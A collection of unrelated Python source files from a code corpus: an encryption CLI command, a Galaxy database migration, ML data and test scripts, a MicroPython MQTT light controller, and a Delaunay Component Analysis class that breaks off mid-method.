raise ValidationError(self.error_messages['invalid'])
return u'%s%s-%s-%s-%s' % (residence, origin, birthday, validity, checksum)
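# A minimal usage sketch (hypothetical; the card number value is elided rather
# than invented, since it must satisfy the format and checksum rules above):
#   field = DEIdentityCardNumberField()
#   field.clean(u'...')  # returns the normalised number or raises ValidationError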
| StarcoderdataPython |
3325631 | """
Encrypt files in the raw-private folder to raw-private-encrypted
"""
import logging
import sys
from argparse import Namespace
from getpass import getpass
from pathlib import Path
from typing import Optional, Iterable
from compendium.command.command import CompendiumCommand
from compendium.compendium import Compendium
from compendium.encryption import encrypt_file, verify_file, get_key
class Encrypt(CompendiumCommand):
"""Encrypt files from private-raw to private-raw-encrypted"""
@classmethod
def add_arguments(cls, parser):
parser.add_argument("files", nargs="*",
                            help="Specify the files to be encrypted (default=all private files)")
parser.add_argument("--password",
help="Specify the password")
parser.add_argument("--verify", action="store_true",
help="Test whether all files are correctly encrypted with this password")
@classmethod
def do_run(cls, compendium: Compendium, args: Namespace):
def _l(f: Path) -> Path:
return f.relative_to(compendium.root)
if args.verify:
for file in compendium.folders.DATA_ENCRYPTED.glob("*"):
infile = compendium.folders.DATA_PRIVATE/file.name
if not infile.exists():
logging.warning(f"WARNING: Encrypted file {_l(file)} "
f"has no corresponding file in {_l(compendium.PRIVATE)}")
files = list(get_files(compendium.folders.DATA_PRIVATE, args.files))
if not files:
print("No files to encrypt, exiting", file=sys.stderr)
sys.exit(1)
if not args.password:
args.password = getpass("Please specify the password to use: ").strip()
if not args.password:
print("No password given, aborting", file=sys.stderr)
sys.exit(1)
if not compendium.folders.DATA_ENCRYPTED.exists():
logging.debug(f"Creating {compendium.folders.DATA_ENCRYPTED}")
compendium.folders.DATA_ENCRYPTED.mkdir()
key = get_key(compendium.salt, args.password)
action = 'Encrypting' if not args.verify else 'Verifying'
logging.info(f"{action} {len(files)} file(s) from {_l(compendium.folders.DATA_PRIVATE)}")
for file in files:
outfile = compendium.folders.DATA_ENCRYPTED/file.name
if args.verify:
logging.debug(f".. {_l(outfile)} -> {_l(file)}?")
if not outfile.exists():
print(f"WARNING: File {_l(outfile)} does not exist")
elif not verify_file(key, file, outfile):
print(f"WARNING: File {_l(file)} could not be decrypted from {_l(outfile)}", file=sys.stderr)
else:
logging.debug(f".. {file} -> {outfile}")
encrypt_file(key, file, outfile)
def get_files(folder: Path, files: Optional[Iterable[str]]):
if not files:
yield from folder.glob("*")
else:
for file in files:
if file.startswith("/"): # absolute path
file = Path(file)
elif "/" in file: # relative wrt current folder
file = Path.cwd()/file
else: # relative wrt private data folder
file = folder/file
if file.parent != folder:
raise Exception(f"Cannot encrypt {file}, not in {folder}")
yield file | StarcoderdataPython |
9529 | <filename>lib/galaxy/model/migrate/versions/0026_cloud_tables.py
"""
This script adds tables needed for Galaxy cloud functionality.
"""
from __future__ import print_function
import datetime
import logging
from sqlalchemy import Boolean, Column, DateTime, ForeignKey, Integer, MetaData, Table, TEXT
now = datetime.datetime.utcnow
log = logging.getLogger( __name__ )
metadata = MetaData()
CloudImage_table = Table( "cloud_image", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "provider_type", TEXT ),
Column( "image_id", TEXT, nullable=False ),
Column( "manifest", TEXT ),
Column( "state", TEXT ),
Column( "architecture", TEXT ),
Column( "deleted", Boolean, default=False ) )
""" UserConfiguredInstance (UCI) table """
UCI_table = Table( "cloud_uci", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "user_id", Integer, ForeignKey( "galaxy_user.id" ), index=True, nullable=False ),
Column( "credentials_id", Integer, ForeignKey( "cloud_user_credentials.id" ), index=True ),
Column( "key_pair_name", TEXT ),
Column( "key_pair_material", TEXT ),
Column( "name", TEXT ),
Column( "state", TEXT ),
Column( "error", TEXT ),
Column( "total_size", Integer ),
Column( "launch_time", DateTime ),
Column( "deleted", Boolean, default=False ) )
CloudInstance_table = Table( "cloud_instance", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "launch_time", DateTime ),
Column( "stop_time", DateTime ),
Column( "user_id", Integer, ForeignKey( "galaxy_user.id" ), index=True, nullable=False ),
Column( "uci_id", Integer, ForeignKey( "cloud_uci.id" ), index=True ),
Column( "type", TEXT ),
Column( "reservation_id", TEXT ),
Column( "instance_id", TEXT ),
Column( "mi_id", Integer, ForeignKey( "cloud_image.id" ), index=True ),
Column( "state", TEXT ),
Column( "error", TEXT ),
Column( "public_dns", TEXT ),
Column( "private_dns", TEXT ),
Column( "security_group", TEXT ),
Column( "availability_zone", TEXT ) )
CloudStore_table = Table( "cloud_store", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "attach_time", DateTime ),
Column( "user_id", Integer, ForeignKey( "galaxy_user.id" ), index=True, nullable=False ),
Column( "uci_id", Integer, ForeignKey( "cloud_uci.id" ), index=True, nullable=False ),
Column( "volume_id", TEXT ),
Column( "size", Integer, nullable=False ),
Column( "availability_zone", TEXT ),
Column( "inst_id", Integer, ForeignKey( "cloud_instance.id" ) ),
Column( "status", TEXT ),
Column( "device", TEXT ),
Column( "space_consumed", Integer ),
Column( "error", TEXT ),
Column( "deleted", Boolean, default=False ) )
CloudSnapshot_table = Table( "cloud_snapshot", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "user_id", Integer, ForeignKey( "galaxy_user.id" ), index=True, nullable=False ),
Column( "uci_id", Integer, ForeignKey( "cloud_uci.id" ), index=True ),
Column( "store_id", Integer, ForeignKey( "cloud_store.id" ), index=True, nullable=False ),
Column( "snapshot_id", TEXT ),
Column( "status", TEXT ),
Column( "description", TEXT ),
Column( "error", TEXT ),
Column( "deleted", Boolean, default=False ) )
CloudUserCredentials_table = Table( "cloud_user_credentials", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "user_id", Integer, ForeignKey( "galaxy_user.id" ), index=True, nullable=False ),
Column( "provider_id", Integer, ForeignKey( "cloud_provider.id" ), index=True, nullable=False ),
Column( "name", TEXT ),
Column( "access_key", TEXT ),
Column( "secret_key", TEXT ),
Column( "deleted", Boolean, default=False ) )
CloudProvider_table = Table( "cloud_provider", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "user_id", Integer, ForeignKey( "galaxy_user.id" ), index=True, nullable=False ),
Column( "type", TEXT, nullable=False ),
Column( "name", TEXT ),
Column( "region_connection", TEXT ),
Column( "region_name", TEXT ),
Column( "region_endpoint", TEXT ),
Column( "is_secure", Boolean ),
Column( "host", TEXT ),
Column( "port", Integer ),
Column( "proxy", TEXT ),
Column( "proxy_port", TEXT ),
Column( "proxy_user", TEXT ),
Column( "proxy_pass", TEXT ),
Column( "debug", Integer ),
Column( "https_connection_factory", TEXT ),
Column( "path", TEXT ),
Column( "deleted", Boolean, default=False ) )
def upgrade(migrate_engine):
metadata.bind = migrate_engine
print(__doc__)
# Load existing tables
metadata.reflect()
try:
CloudProvider_table.create()
CloudUserCredentials_table.create()
CloudImage_table.create()
UCI_table.create()
CloudInstance_table.create()
CloudStore_table.create()
CloudSnapshot_table.create()
except Exception:
log.exception("Creating cloud tables failed.")
def downgrade(migrate_engine):
metadata.bind = migrate_engine
metadata.reflect()
try:
CloudSnapshot_table.drop()
CloudStore_table.drop()
CloudInstance_table.drop()
UCI_table.drop()
CloudImage_table.drop()
CloudUserCredentials_table.drop()
CloudProvider_table.drop()
except Exception:
log.exception("Dropping cloud tables failed.")
| StarcoderdataPython |
37387 |
import numpy as np
import torch
import tqdm
# NOTE: setting, num_goals, eps_per_run, rendering, visualize, vispath,
# unarbitrary_prefs, one_hot and render_path are assumed to be module-level
# configuration/helpers defined elsewhere in the original project.
def create_supervised_data(env, agents, num_runs=50):
val = []
# the data threeple
action_history = []
predict_history = []
mental_history = []
character_history = []
episode_history = []
traj_history = []
grids = []
ep_length = env.maxtime
filler = env.get_filler()
obs = env.reset(setting=setting, num_visible=num_goals)
for ep in tqdm.tqdm(range(num_runs*eps_per_run)):
buffer_s = [np.zeros(obs[0].shape) for _ in range(env.maxtime)]
if (ep % eps_per_run) == eps_per_run-1:
obs = env.reset(setting=setting, num_visible=num_goals)
else:
obs = env.reset()
if ep % eps_per_run == 0:
episode_number = 0
#clear ep_history here?
for agent in agents:
if not unarbitrary_prefs:
agent.reset_prefs()
else:
agent.hardcode_prefs()
prevact = None
prevpos = None
agentpos = agents[0].pos
episode_time = 0
while not env.done:
if rendering and ((ep % eps_per_run) == eps_per_run-1):
env.render()
buffer_s.append(obs[0])
actions = [agent.action(torch.FloatTensor([buffer_s[-env.maxtime:]]).cuda()),]
agentpos = agents[0].pos
thistraj = env.get_trajectory(agentpos, prevact, prevpos)
prevpos = agentpos
#without agent position, thisact of none is pretty meaningless
prevact = actions[0]
traj_history += [thistraj, ]
#moved this to before following if
episode_time += 1
if ((ep % eps_per_run) == eps_per_run-1):
# each step in last episode
#episode number is 3
if visualize:
render_path(env, ep, episode_time, vispath)
#print(actions)
run = np.zeros((eps_per_run, ep_length, *filler.shape))
if eps_per_run > 1:
run[-episode_number-1:-1] = episode_history[-episode_number:]
episode = np.zeros((ep_length, *filler.shape))
episode[ep_length-episode_time:] = traj_history[-episode_time]
run[-1] = episode
shortterm = np.asarray(traj_history[-1])
action_history += [one_hot(5, actions[0]),]
character_history += [run,]
mental_history += [episode,]
predict_history += [shortterm,]
if not env.full_test:
break
obs, _, _, = env.step(actions)
# end of episode
episode = np.zeros((ep_length, *filler.shape))
episode[ep_length-episode_time:] = traj_history[-episode_time:]
episode_history += [episode, ]
episode_number += 1
return character_history, mental_history, predict_history, action_history
def format_data_torch(data, **train_kwargs):
char = np.asarray(data[0]).astype('float32')
    # char has shape (N, Ep, F, W, H, C); swapping axes 3 and 5 gives (N, Ep, F, C, H, W)
char = np.swapaxes(char, 3, 5)
mental = np.asarray(data[1]).astype('float32')
    # mental has shape (N, F, W, H, C); swapping axes 2 and 4 gives (N, F, C, H, W)
mental = np.swapaxes(mental, 2, 4)
query = np.asarray(data[2][:]).astype('float32')
# (N, W, H, C) = second.shape
#second.reshape((N, C, H, W))
query = np.swapaxes(query, 1, 3)
act = np.asarray(data[3][:]).astype('int32')
char1 = torch.Tensor(char).cuda()#[:, 0, :, :, :, :]
mental1 = torch.Tensor(mental).cuda()
query1 = torch.Tensor(query).cuda()#[:, 0, :, :, :]
act1 = torch.Tensor(act).cuda()
dataset = torch.utils.data.TensorDataset(char1, mental1, query1, act1)
return torch.utils.data.DataLoader(dataset, **train_kwargs)
def supervised_training(env, agents, data):
dummies = [Dummy(steps, model) for agent in agents]
class DummyAgent():
'''
railroads the agent for some steps,
then switches to an alternate model.
railroaded steps should be included in
environment's test condition,
returned as the final value of reset()
predefined strategies after the railroaded
steps are compared with the alt model's output
'''
def __init__(self, railroad, strategies, model):
self.n = -1
self.length = len(railroad)
self.model = model
self.rails = railroad
self.strats = strategies
def choose_action(self, obs):
            if self.n + 1 < self.length:  # still inside the railroaded steps
self.n += 1
                return self.rails[self.n], [0 for x in self.strats]
else:
self.n += 1
act = self.model.choose_action(obs)
return act, [act == x[self.n] for x in self.strats]
        def reset(self, railroad, strategies):
            self.n = -1  # restart the railroaded phase
            self.length = len(railroad)
            self.rails = railroad
            self.strats = strategies
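    # Hypothetical use of the railroaded agent (names are placeholders; per the
    # docstring, the environment is assumed to return the forced steps and the
    # candidate strategies from reset()):
    #   rails, strategies = env.reset(...)
    #   dummy = DummyAgent(rails, strategies, model)
    #   act, matches = dummy.choose_action(obs)  # `matches` flags agreement with each strategy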
| StarcoderdataPython |
191516 |
import unittest
import _init_paths
from datasets.pascal_voc import pascal_voc
class MyTestCase(unittest.TestCase):
def test_pascal_voc(self):
d = pascal_voc('trainval', '2007')
res = d.roidb
from IPython import embed
embed()
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
3265157 | from ...plugins.sqliteregistry import SqliteRegistry
def get_sql_registry():
sql_registry = SqliteRegistry()
return lambda: sql_registry
| StarcoderdataPython |
1606048 | import network
import time
import gc
import apa
import pwm
from umqtt.simple import MQTTClient
# Config
wifi_ssid = "HaSi-Kein-Internet-Legacy"
wifi_psk = "bugsbunny"
mqtt_server = "mqtt.hasi"
mqtt_client_name = "ircometer"
mqtt_state_topic = "hasi/lights/ircometer"
mqtt_msg_topic = "hasi/telegram/message"
lights_on = True
mqtt_client = None
wifi = None
activity = 0.0
def play_animation():
apa.color(255, 255, 255, 31)
pwm.amplitude(0.25)
time.sleep(0.1)
apa.color(255, 255, 255, 0)
pwm.amplitude(0.0)
time.sleep(0.1)
apa.color_r(255, 255, 255, 31)
pwm.amplitude(0.5)
time.sleep(0.2)
apa.color(255, 255, 255, 0)
pwm.amplitude(0.0)
time.sleep(0.1)
apa.color_l(255, 255, 255, 31)
pwm.amplitude(1.0)
time.sleep(0.5)
apa.color(255, 255, 255, 0)
pwm.amplitude(0.0)
time.sleep(0.5)
apa.color_r(255, 255, 255, 31)
pwm.amplitude(1.0)
time.sleep(0.2)
apa.color_l(255, 255, 255, 31)
time.sleep(0.1)
apa.color_r(255, 255, 255, 0)
time.sleep(0.2)
apa.color_r(255, 255, 255, 31)
time.sleep(0.2)
for i in range(255):
apa.color(255-i, 255, 255-i, 31)
pwm.amplitude(100/(i+1))
set_amplitude(0.0)
def setup():
print('Setting up...')
global wifi
global wifi_ssid
global wifi_psk
global mqtt_state_topic
global mqtt_msg_topic
global mqtt_server
global mqtt_client
global mqtt_client_name
# Setup Network
wifi = network.WLAN(network.STA_IF)
wifi.active(True)
if not wifi.isconnected():
print('connecting to network...')
wifi.connect(wifi_ssid, wifi_psk)
while not wifi.isconnected():
pass
print('network config:', wifi.ifconfig())
# Setup MQTT
mqtt_client = MQTTClient(mqtt_client_name, mqtt_server)
mqtt_client.set_callback(mqtt_callback)
mqtt_client.connect()
mqtt_client.subscribe(bytes(mqtt_state_topic, "utf-8"))
mqtt_client.subscribe(bytes(mqtt_msg_topic, "utf-8"))
def set_amplitude(p):
p = min(p, 1.0)
if lights_on:
apa.amplitude(p)
pwm.amplitude(p)
else:
apa.color(0, 0, 0, 0)
pwm.amplitude(0.0)
def mqtt_callback(topic, msg):
global lights_on
global activity
message = str(msg, "utf-8")
topic = str(topic, "utf-8")
if topic == mqtt_state_topic:
if message == "on" and not lights_on:
print("mqtt on")
play_animation()
lights_on = True
elif message == "off" and lights_on:
print("mqtt off")
lights_on = False
elif topic == mqtt_msg_topic:
print("received a message")
if activity < 2.0:
activity += 0.1
def loop():
global wifi
global activity
global mqtt_client
while True:
if not wifi.isconnected():
setup()
else:
gc.collect()
mqtt_client.check_msg()
if activity >= 0.0001:
activity -= 0.0001
set_amplitude(activity)
time.sleep(0.1)
play_animation()
setup()
loop()
| StarcoderdataPython |
3346504 | from django.conf.urls import url, patterns
from . import views
urlpatterns = patterns('',
url(r'^$', views.my_contact, name='satchless-contact-my-contact'),
url(r'^address/new/', views.address_edit, name='satchless-contact-address-new'),
url(r'^address/(?P<address_pk>[0-9]+)/edit/',
views.address_edit, name='satchless-contact-address-edit'),
)
| StarcoderdataPython |
107909 | <filename>tests/model/test_flair.py
# -*- coding: utf-8 -*-
import pytest
import os
import torch
import flair
from eznlp.token import TokenSequence
from eznlp.model import FlairConfig
from eznlp.training import count_params
@pytest.mark.parametrize("agg_mode", ['last', 'mean'])
def test_flair_embeddings(agg_mode, flair_lm):
batch_tokenized_text = [["I", "like", "it", "."],
["Do", "you", "love", "me", "?"],
["Sure", "!"],
["Future", "it", "out"]]
flair_emb = flair.embeddings.FlairEmbeddings(flair_lm)
flair_sentences = [flair.data.Sentence(" ".join(sent), use_tokenizer=False) for sent in batch_tokenized_text]
flair_emb.embed(flair_sentences)
expected = torch.nn.utils.rnn.pad_sequence([torch.stack([tok.embedding for tok in sent]) for sent in flair_sentences],
batch_first=True,
padding_value=0.0)
flair_config = FlairConfig(flair_lm=flair_lm, agg_mode=agg_mode)
flair_embedder = flair_config.instantiate()
batch_tokens = [TokenSequence.from_tokenized_text(tokenized_text) for tokenized_text in batch_tokenized_text]
batch_flair_ins = flair_config.batchify([flair_config.exemplify(tokens) for tokens in batch_tokens])
if agg_mode.lower() == 'last':
assert (flair_embedder(**batch_flair_ins) == expected).all().item()
else:
assert (flair_embedder(**batch_flair_ins) != expected).any().item()
@pytest.mark.parametrize("freeze", [True, False])
@pytest.mark.parametrize("use_gamma", [True, False])
def test_trainble_config(freeze, use_gamma, flair_lm):
flair_config = FlairConfig(flair_lm=flair_lm, freeze=freeze, use_gamma=use_gamma)
flair_embedder = flair_config.instantiate()
expected_num_trainable_params = 0
if not freeze:
expected_num_trainable_params += count_params(flair_lm, return_trainable=False)
if use_gamma:
expected_num_trainable_params += 1
assert count_params(flair_embedder) == expected_num_trainable_params
def test_serialization(flair_fw_lm):
config = FlairConfig(flair_lm=flair_fw_lm)
config_path = "cache/flair_embedder.config"
torch.save(config, config_path)
assert os.path.getsize(config_path) < 1024 * 1024 # 1MB
| StarcoderdataPython |
4821708 | from .krokimagic import KrokiMagic
def load_ipython_extension(ipython):
ipython.register_magics(KrokiMagic)
| StarcoderdataPython |
4834873 | <gh_stars>1-10
import gc
import networkx as nx
import numpy as np
import os
import logging
import pickle
from dca.schemes import (
DCALoggers,
DelaunayGraphVisualizer,
REData,
ExperimentDirs,
DelaunayGraphParams,
HDBSCANParams,
GeomCAParams,
QueryData,
)
from dca.delaunay_graph import DelaunayGraph
from typing import Optional, List
import pandas as pd
import dca.delaunay_graph_utils as graph_utils
import dca.visualization as visualization
import logging.config
from dca.loggers import logger_time, get_parameters
import json
# -------------------------------------------------------------------------- #
# Logging settings
# -------------------------------------------------------------------------- #
logger = logging.getLogger("DCA_info_logger")
result_logger = logging.getLogger("DCA_result_logger")
time_logger = logging.getLogger("DCA_time_logger")
# -------------------------------------------------------------------------- #
# -------------------------------------------------------------------------- #
class DCA:
def __init__(
self,
dirs: ExperimentDirs,
Delaunay_graph_params: DelaunayGraphParams,
clustering_params: HDBSCANParams,
GeomCA_params: GeomCAParams,
loggers: DCALoggers,
random_seed: int = 1111,
):
np.random.seed(random_seed)
# Paths
self.root = dirs.experiment_dir
self.precomputed_dir = dirs.precomputed_dir
self.DCA_dir = dirs.DCA_dir
self.visualization_dir = dirs.visualization_dir
self.results_dir = dirs.results_dir
self.logs_dir = dirs.logs_dir
# Initialize the loggers
self.loggers = loggers
logging.config.dictConfig(loggers.loggers)
# Parameters
self.GeomCA_params = GeomCA_params
self.graph_params = Delaunay_graph_params
self.clustering_params = clustering_params
self.save_parameters(
[dirs, Delaunay_graph_params, clustering_params, GeomCA_params],
random_seed,
loggers.version,
)
# Visualisation
self.visualize_Delaunay_graph = False
# -------------------------------------------------------------------------- #
# Prepocess data and save parameters
# -------------------------------------------------------------------------- #
def preprocess_data(self, data: REData):
"""
Prepares the input array for Delaunay approximation.
:param data: R and E data parameters.
:return: DelaunayGraphVisualizer object.
"""
input_array_filepath = os.path.join(self.root, data.input_array_filepath)
if not os.path.isfile(input_array_filepath):
input_array = np.concatenate([data.R, data.E]).astype(np.float32)
np.save(input_array_filepath, input_array)
if data.visualize:
G_visualizer = DelaunayGraphVisualizer(
os.path.join(self.root, data.input_array_filepath),
data.num_R,
data.num_E,
)
logger.debug("DelaunayGraphVisualizer initialized")
return G_visualizer
def preprocess_query_data(self, query_data: QueryData):
"""
Prepares the input array of query points for query point Delaunay approximation.
:param query_data: query data parameters.
"""
query_input_array_filepath = os.path.join(
self.root, query_data.query_input_array_filepath
)
if not os.path.isfile(query_input_array_filepath):
input_array = query_data.Q.astype(np.float32)
np.save(query_input_array_filepath, input_array)
def save_parameters(
self,
params_list: List,
random_seed: int = 1111,
version: int = 0,
):
"""
Saves input parameters.
:param params_list: list of input parameters.
:param random_seed:
:param version: experiment version index.
"""
params_dict = {"random_seed": random_seed}
for params in params_list:
dict = get_parameters(params)
params_dict = {**params_dict, **dict}
with open(
os.path.join(self.logs_dir, f"version{version}_input.json"),
"w",
) as f:
json.dump(params_dict, f, indent=4)
# -------------------------------------------------------------------------- #
# DCA: R and E
# -------------------------------------------------------------------------- #
@logger_time
def fit(self, data: REData):
"""
DCA
Runs DCA algorithm on the given sets of representations R and E.
:param data: R and E data parameters.
:return: DCA local and global evaluation scores.
"""
print("Starting to run DCA...")
# Preprocess input data
G_visualizer = self.preprocess_data(data)
logger.debug("Input data saved")
# Get Delaunay graph
G = self.get_Delaunay_graph(data, G_visualizer)
logger.debug("DelaunayGraph initialized")
print("- Delaunay graph approximated.")
n_points = data.num_R + data.num_E
del data
gc.collect()
# Get Delaunay connected components
(
component_vertex_idx_mapping,
first_non_trivial_component,
) = self.get_Delaunay_connected_components(n_points, G.graph, G_visualizer)
logger.debug("Delaunay connected components obtained")
G.set_first_trivial_component_idx(first_non_trivial_component.item())
logger.debug(
"Delaunay first non trivial component set to: %s",
first_non_trivial_component,
)
print("- Distilled Delaunay graph built.")
# Analyse Delaunay connected components
self.analyse_Delaunay_connected_components(
component_vertex_idx_mapping, G, G_visualizer
)
logger.debug("Delaunay connected components analysed")
print("- Distilled Delaunay graph analysed.")
# Save results
output = self.save_DCA_logs(G)
logger.debug("- DCA results saved.")
# Plot results
visualization._plot_RE_components_consistency(
G,
self.visualization_dir,
min_comp_size=2,
annotate_largest=True,
display_smaller=False,
)
visualization._plot_RE_components_quality(
G,
self.visualization_dir,
min_comp_size=2,
annotate_largest=True,
display_smaller=False,
)
logger.debug("DCA results visualized")
print("- DCA executed, results saved to: {0}.".format(self.DCA_dir))
return output
@logger_time
def get_Delaunay_graph(
self, data: REData, visualizer: Optional[DelaunayGraphVisualizer] = None
):
"""
Phase 1
Approximates and filters Delunay graph on the given sets of representations R and E.
:param data: R and E data parameters.
:param visualizer: DelaunayGraphVisualizer object.
:return: approximated and filtered Delaunay graph.
"""
# Build Delaunay edges if it does not exists
graph_utils._approximate_Delaunay_edges(
self.root, data.input_array_filepath, self.graph_params
)
logger.debug(
"Delaunay graph {0} created with parameter nrays={1}.".format(
os.path.join(self.root, self.graph_params.unfiltered_edges_filepath),
self.graph_params.T,
)
)
# Filter Delaunay edges if specified
if self.graph_params.sphere_coverage == 1.0:
Delaunay_edges = np.load(
os.path.join(self.root, self.graph_params.unfiltered_edges_filepath)
)[:, :2]
Delaunay_edges_len = np.load(
os.path.join(self.root, self.graph_params.unfiltered_edges_len_filepath)
)
logger.debug("Unfiltered Delaunay edges of shape: %s", Delaunay_edges.shape)
else:
logger.debug(
"Chosen sphere coverage: %s", self.graph_params.sphere_coverage
)
unfiltered_Delaunay_edges_shape = graph_utils._filter_Delaunay_edges(
os.path.join(self.root, self.graph_params.unfiltered_edges_filepath),
os.path.join(
self.root, self.graph_params.unfiltered_edges_len_filepath
),
self.graph_params,
os.path.join(self.root, self.graph_params.filtered_edges_filepath),
os.path.join(self.root, self.graph_params.filtered_edges_len_filepath),
data.num_R + data.num_E,
)
Delaunay_edges = np.load(
os.path.join(self.root, self.graph_params.filtered_edges_filepath)
)
Delaunay_edges_len = np.load(
os.path.join(self.root, self.graph_params.filtered_edges_len_filepath)
)
logger.debug(
"Unfiltered Delaunay graph shape: %s", unfiltered_Delaunay_edges_shape
)
logger.debug("Filtered Delaunay graph shape: %s", Delaunay_edges.shape)
logger.debug("Delaunay edges extracted")
# Init DelaunayGraph
G = DelaunayGraph(data.num_R, data.num_E)
G.init_Delaunay_graph(Delaunay_edges, Delaunay_edges_len)
if visualizer is not None:
visualization._plot_Delaunay_graph(
visualizer,
edges=Delaunay_edges,
filename="approximated_Delaunay_graph",
root=self.visualization_dir,
)
logger.debug("Delaunay edges visualized")
return G
@logger_time
def get_Delaunay_connected_components(
self,
n_points: int,
graph: nx.Graph,
visualizer: Optional[DelaunayGraphVisualizer] = None,
):
"""
Phase 2
Distilles the approximated Delunay graph into connected components.
:param n_points: total number of points in R and E.
:param graph: approximated Delaunay graph.
:param visualizer: DelaunayGraphVisualizer object.
:return: dict with keys representing component indices and arrays of
corresponding vertices containined in each component as values;
index of the first non trivial component.
"""
# Perform HDBSCAN clustering
input_array_labels = graph_utils._distil_Delaunay_connected_components(
self.root, self.clustering_params, graph
)
logger.debug("HDBSCAN executed")
logger.debug(
"Number of significant connected components: %s",
len(np.unique(input_array_labels)),
)
if visualizer is not None:
xlim, ylim = visualization._plot_Delaunay_graph(
visualizer,
graph.edges,
filename="Delaunay_components",
root=self.visualization_dir,
labels=input_array_labels,
)
logger.debug("Delaunay connected components visualized")
visualizer.xlim = xlim
visualizer.ylim = ylim
logger.debug(f"DelaunayGraphVisualizer updated xlim={xlim} and ylim={ylim}")
# Extract components sorted by their vertex size
(
component_vertex_idx_mapping,
first_non_trivial_component,
) = graph_utils._sort_Delaunay_connected_components(
self.root,
input_array_labels,
self.clustering_params,
n_points,
)
logger.debug("Delaunay connected components extracted")
gc.collect()
return (component_vertex_idx_mapping, first_non_trivial_component)
@logger_time
def analyse_Delaunay_connected_components(
self,
component_vertex_idx_mapping: dict,
G: DelaunayGraph,
visualizer: Optional[DelaunayGraphVisualizer] = None,
discard_component_graph: Optional[bool] = True,
):
"""
Phase 3
Analyses the connected components of the distilled Delunay graph.
:param component_vertex_idx_mapping: dictionary of vertex indices contained in each component.
:param G: distilled Delaunay graph.
:param visualizer: DelaunayGraphVisualizer object.
:param discard_component_graph: whether to discard the component nx.Graph object (storage heavy).
"""
for comp_idx, comp_vertices in component_vertex_idx_mapping.items():
subgraph_RE_comp = G.graph.subgraph(comp_vertices)
if nx.is_empty(subgraph_RE_comp):
subgraph_RE_comp = nx.Graph()
subgraph_RE_comp.add_nodes_from(comp_vertices)
if visualizer is not None and comp_idx < G.first_trivial_component_idx:
visualization._plot_Delaunay_graph(
visualizer,
edges=subgraph_RE_comp.edges,
filename=f"component_{comp_idx}_Delaunay",
root=self.visualization_dir,
vertices=np.array(comp_vertices),
keep_range=True,
)
logger.debug(f"Delaunay connected component {comp_idx} visualized")
subgraph_R_comp, subgraph_E_comp = graph_utils._extract_RE_subgraphs(
subgraph_RE_comp, G.num_R, G.num_E
)
(
comp_R_idxs,
comp_E_idxs,
comp_consistency,
comp_quality,
num_comp_RE_edges,
num_total_comp_edges,
) = graph_utils._evaluate_Delaunay_component(
subgraph_RE_comp, subgraph_R_comp, subgraph_E_comp, G.num_R
)
logger.debug(f"Delaunay connected component {comp_idx} analyzed")
G.update_local_stats(
comp_R_idxs,
comp_E_idxs,
comp_consistency,
comp_quality,
num_comp_RE_edges,
num_total_comp_edges,
self.GeomCA_params.comp_consistency_threshold,
self.GeomCA_params.comp_quality_threshold,
None if not discard_component_graph else subgraph_RE_comp,
)
logger.debug(f"DelaunayGraph updated local stats with component {comp_idx}")
if visualizer is not None:
visualization._plot_isolated_components(
G, visualizer, self.visualization_dir
)
logger.debug("Isolated Delaunay connected components")
visualization._plot_Delaunay_graph(
visualizer,
edges=G.distil_edges(),
filename="distilled_Delaunay_graph",
root=self.visualization_dir,
)
logger.debug("distilled Delaunay edges visualized")
G.update_global_stats()
logger.debug(f"DelaunayGraph updated global stats")
def save_DCA_logs(self, G: DelaunayGraph):
"""
Saves DCA scores to files.
:param G: distilled Delaunay graph with local and global evaluation scores.
"""
path = os.path.join(self.results_dir, "network_stats.pkl")
with open(path, "wb") as f:
pickle.dump(G.network_stats, f)
logger.debug(f"DelaunayGraph network_stats saved")
path = os.path.join(self.results_dir, "components_stats.pkl")
with open(path, "wb") as f:
pickle.dump(G.comp_stats, f)
logger.debug(f"DelaunayGraph components_stats saved")
output = G.save_stats()
with open(os.path.join(self.DCA_dir, "output.json"), "w") as fp:
json.dump(output, fp, indent=4)
def cleanup(self, remove_visualizations: bool = True, remove_logs: bool = True):
"""
Removes the DCA files in the experiment folder. Default removes all files except for the output scores.
:param remove_visualizations: whether to remove the visualizations.
:param remove_logs: whether to remove the logging files.
"""
# Remove precomputed folder
os.system(f"rm -r {self.precomputed_dir}")
# Remove DCA dir
os.system((f"rm -r {self.results_dir}"))
# Remove logs
if remove_logs:
os.system(f"rm -r {self.logs_dir}")
else: # Remove all non-log files, eg npy from qDCA
            for file in os.listdir(str(self.logs_dir)):
                if not file.endswith(".logs"):
                    # build the full path: os.listdir returns bare file names
                    os.system(f"rm {os.path.join(str(self.logs_dir), file)}")
# Remove logs
if remove_visualizations:
os.system(f"rm -r {self.visualization_dir}")
print("- Cleanup completed.")
# -------------------------------------------------------------------------- #
# qDCA: query point processing
# -------------------------------------------------------------------------- #
@logger_time
def process_query_points(
self,
init_data: REData,
query_data: QueryData,
assign_to_comp: bool = False,
consider_several_assignments: bool = False,
assign_to_R: bool = False,
assign_to_RE: bool = False,
return_len: bool = False,
):
"""
query point Delaunay Component Analysis (q-DCA).
:param init_data: R and E data parameters.
:param query_data: query data parameters.
:param assign_to_comp: whether to assign query points to fundamental components.
:param consider_several_assignments: whether to consider fliexible assignment.
:param assign_to_R: whether to assign query points to R points only.
:param assign_to_RE: whether to assign query points to R and E points.
:param return_len: whether to return the length of the shortest edges.
:return: dataframe of query point indices and the associated assignments.
"""
self.loggers.qdca_flag = True
G = DelaunayGraph(init_data.num_R, init_data.num_E)
G.load_existing(self.results_dir)
logger.debug("Loaded existing DelaunayGraph")
self.preprocess_query_data(query_data)
if assign_to_comp:
(
